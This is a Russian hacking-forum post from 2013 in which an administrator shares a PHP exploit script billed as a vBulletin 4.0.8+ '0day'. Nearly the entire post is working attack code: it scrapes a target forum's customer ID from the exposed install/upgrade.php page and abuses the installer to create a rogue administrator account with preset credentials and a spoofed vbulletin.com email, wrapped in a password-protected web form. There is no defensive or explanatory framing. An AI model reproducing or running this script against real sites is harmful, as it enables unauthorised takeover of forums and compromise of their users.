Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

Exploit 0day vBulletin >= 4.0.8 by $DoC

Тема в разделе vBulletin, создана пользователем ERROR404, 25 дек 2013.

Войдите для ответа
  1. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    [​IMG]



    <?php
    error_reporting(0);
    
    /*
     * Exploit 0Day vBulletin >= 4.0.8
     * Coded $DoC (@docindetectable)
     * Thanks SuC
     * @bugtraqTeam
     */
    
    // Config of new admin user added, after exploited
    $newuser = 'supportvb';
    $newpass = 'owned';
    $newmail = 'support@vbulletin.com';
    
    if ($_SERVER['PHP_AUTH_USER'] == 'doc' && $_SERVER['PHP_AUTH_PW'] == 'vbfucked')
    {
    ?>
        <html>
            <head>
                <title>Exploit 0Day vBulletin >= 4.0.8</title>
            </head>
            <body>
                <form method='post' action=''>
                    <center>
                    <img src="http://cs11385.vk.me/g24263364/a_1fee9df8.jpg">
                    <br/>
                    <label style='color: red'>vBulletin >= 4.0.8</label>
                    <br/><br/>
                    <label>Forum URL: </label>
                    <br/>
                    <input type="text" name="url">
                    <br/>
                    <input type='submit' name='action' value='EXPLOIT'>
                    </center>
                </form>
            </body>
        </html>
        <?php
        if(isset($_POST['action']))
        {
            $url0day = $_POST['url'] . '/install/upgrade.php';
            $fgc = file_get_contents($url0day);
    
            $customerid = ExtraerFrase('CUSTNUMBER = "', '";', $fgc);
            $version1 = ExtraerFrase('vBulletin ', '.', $fgc);
            $version2 = ExtraerFrase('vBulletin '.$version1.'.', '.', $fgc);
            $version3 = ExtraerFrase('vBulletin '.$version1.'.'.$version2.'.', '.', $fgc);
    
            $array_post = array(
                'ajax' => urlencode('1'),
                'version' => urlencode('install'),
                'checktable' => urlencode('false'),
                'firstrun' => urlencode('false'),
                'step' => urlencode('7'),
                'startat' => urlencode('0'),
                'only' => urlencode('false'),
                'customerid' => urlencode($customerid),
                'options[skiptemplatemerge]' => urlencode('0'),
                'response' => urlencode('yes'),
                'htmlsubmit' => urlencode('1'),
                'htmldata[username]' => urlencode($newuser),
                'htmldata[password]' => urlencode($newpass),
                'htmldata[confirmpassword]' => urlencode($newpass),
                'htmldata[email]' => urlencode($newmail)
            );
    
            foreach($array_post as $key => $value)
            {
                $post .= $key.'='.$value.'&';
            }
    
            rtrim($post, '&');
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url0day);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
            curl_setopt($ch, CURLOPT_COOKIESESSION, 1);
            curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$customerid);
            $result = curl_exec($ch);
    
            if($result === false || ($version1 < 4 && $version3 < 8))
            {
                echo '<center><label style="color:red">ERROR</label><br/><label>Not possible exploiting vulnerability.</label></center>';
            }
            else
            {
                echo '<center><label style="color:green">OK</label><br/><label>'.htmlentities($_POST["url"]).'</label><br/><label>User: '.$newuser.' - Pass: '.$newpass.'</label></center>';
            }
        }
    }
    else
    {
        header('WWW-Authenticate: Basic realm="Priv8 Script :)"');
        header('HTTP/1.0 401 Unauthorized');
        exit;
    }
    
    function ExtraerFrase($separador1, $separador2, $cadena) {
        if (strpos($cadena, $separador1) !== false) {
            $pos = strpos($cadena, $separador1);
            $a = substr($cadena, $pos + strlen($separador1));
            if (strpos($a, $separador2) !== false) {
                $npos = strpos($a, $separador2);
                $b = substr($a, 0, $npos);
                return $b;
            } else return $a;
        } else return false;
    }
    ?>
    [/CODE]
     
    25 дек 2013 #1
Top